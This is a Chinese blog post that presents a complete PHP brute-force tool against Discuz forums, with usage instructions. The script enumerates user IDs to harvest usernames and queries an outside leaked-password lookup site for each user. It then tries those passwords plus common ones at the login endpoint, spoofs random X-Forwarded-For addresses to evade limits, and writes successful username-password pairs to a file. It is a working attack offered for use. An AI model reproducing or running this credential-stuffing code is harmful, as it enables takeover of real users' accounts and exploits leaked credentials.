Discuz 爆破无视验证码

  • 内容
  • 相关
<?php
class fuckdz{
public function sgk($user){
    $a=file_get_contents(&quot;http://www.soyun.org/cha_api.php?so=$user&amp;auto=&quot;);
    $a=iconv(&quot;UTF-8&quot;, &quot;GB2312//IGNORE&quot;, $a);
    preg_match_all(&quot;/7%\&quot;&gt;(.*)&lt;/isU&quot;,$a,$arr);
    unset($arr[0]);
    foreach ($arr as $key=&gt;$r){
        return $r;
        }
}

public function getuid($host,$uid){
        $ip= rand(100, 244).&#039;.&#039;.rand(100, 244).&#039;.&#039;.rand(100, 244).&#039;.&#039;.rand(100, 244);
        $opts = array (   
        &#039;http&#039; =&gt; array (   
        &#039;method&#039; =&gt; &#039;GET&#039;,   
        &#039;header&#039;=&gt; &quot;User-Agent: Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile\r\nReferer:http://www.baidu.com/index.php\r\nX-Forwarded-For: $ip\r\nCookie: xx=xx&quot;,
        &#039;timeout&#039;=&gt;15, ) 
        ); 
        $context = stream_context_create($opts); 
         $a=file_get_contents(&quot;$host/home.php?mod=space&amp;do=profile&amp;from=space&amp;&amp;uid=$uid&quot;,false,$context);
        if(strpos($a,&#039;charset=utf-8&#039;)){
        $a=iconv(&quot;UTF-8&quot;, &quot;GB2312//IGNORE&quot;, $a);

        }

        if(preg_match(&quot;/&lt;title&gt;(.*)的个人/isU&quot;,$a,$arr)){

        $a=str_replace(&quot;\r&quot;,&quot;&quot;,trim($arr[1]));
        $a=trim(str_replace(&quot;\n&quot;,&quot;&quot;,$a));
        return $a; 
        }else{
        return false;
        }

}

public function is_pass($host,$user,$pass){
        $ip= rand(100, 244).&#039;.&#039;.rand(100, 244).&#039;.&#039;.rand(100, 244).&#039;.&#039;.rand(100, 244);
        $opts = array (   
        &#039;http&#039; =&gt; array (   
        &#039;method&#039; =&gt; &#039;GET&#039;,   
        &#039;header&#039;=&gt; &quot;User-Agent: Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobil\r\nReferer:http://www.baidu.com/index.php\r\nX-Forwarded-For: $ip\r\nCookie: xx=xx&quot;,
        &#039;timeout&#039;=&gt;15, ) 
        ); 

        $context = stream_context_create($opts); 
         $a=file_get_contents(&quot;$host/member.php?mod=logging&amp;action=login&amp;loginsubmit=yes&amp;infloat=yes&amp;lssubmit=yes&amp;inajax=1&amp;handlekey=ls&amp;quickforward=yes&amp;username=$user&amp;password=$pass&quot;,false,$context);
        if(strpos($a,&quot;window.location.href&quot;)){
            return true;
        }else{
            return false;
        }

}
public function crack($host,$a,$b){
$host=str_replace(&quot;http://&quot;,&quot;&quot;,$host);
$host=&quot;http://&quot;.$host.&quot;/&quot;;

for($vip=$a;$vip&lt;=$b;$vip++){ 

    if(!($user=$this-&gt;getuid($host,$vip))){

     continue;
    }
    $pass=$this-&gt;sgk($user);
    array_push($pass,&quot;123456&quot;);
    array_push($pass,&quot;654321&quot;);
    array_push($pass,&quot;123123&quot;);
    array_push($pass,&quot;woaini&quot;);
    array_push($pass,&quot;caonima&quot;);
    array_push($pass,&quot;12345&quot;);
    array_push($pass,&quot;12345789&quot;);
    array_push($pass,&quot;5201314&quot;);
    array_push($pass,&quot;1314520&quot;);
    array_push($pass,$user);
    array_push($pass,$user.&quot;123456&quot;);
    array_push($pass,&quot;abc123&quot;);
    array_push($pass,$user.&quot;..&quot;);

        for($i=0;isset($pass[$i]);$i++){ 
            echo &quot;\r\n正在爆破UID:$vip-[&quot;.$user.&quot;]---&quot;.$pass[$i].&quot;&quot;;
            if($this-&gt;is_pass($host,$user,$pass[$i])){
                    echo &quot;爆破成功!\r\n--------------------&quot;;
                    file_put_contents(&quot;ok.txt&quot;, $user.&quot;---&quot;.$pass[$i].&quot;\r\n&quot;,FILE_APPEND);
                    break;

                }else{
                    echo &quot;爆破失败&quot;;
                }

            } 

    }

}

}

$f=new fuckdz();

//error_reporting(0);

set_time_limit(0);


if(empty($argv[1])){

print_r("

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


  开始爆破:php.exe $argv[0] 网址 起始uid 结束uid 
  示例: php.exe $argv[0] http://www.shungg.cn/ 1 255
  结果保存在ok.txt里
  Blog:http://www.shungg.cn/

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++   \n\n\n

");

}else{


if(!empty($argv[1])){


$f-&gt;crack($argv[1],$argv[2],$argv[3]);

}else{

echo "逗比";

}


}


?>

本文标签:

版权声明:若无特殊注明,本文皆为《舜哥哥吖》原创,转载请保留文章出处。

本文链接:Discuz 爆破无视验证码 - http://www.shungg.cn/post/74

发表评论

电子邮件地址不会被公开。 必填项已用*标注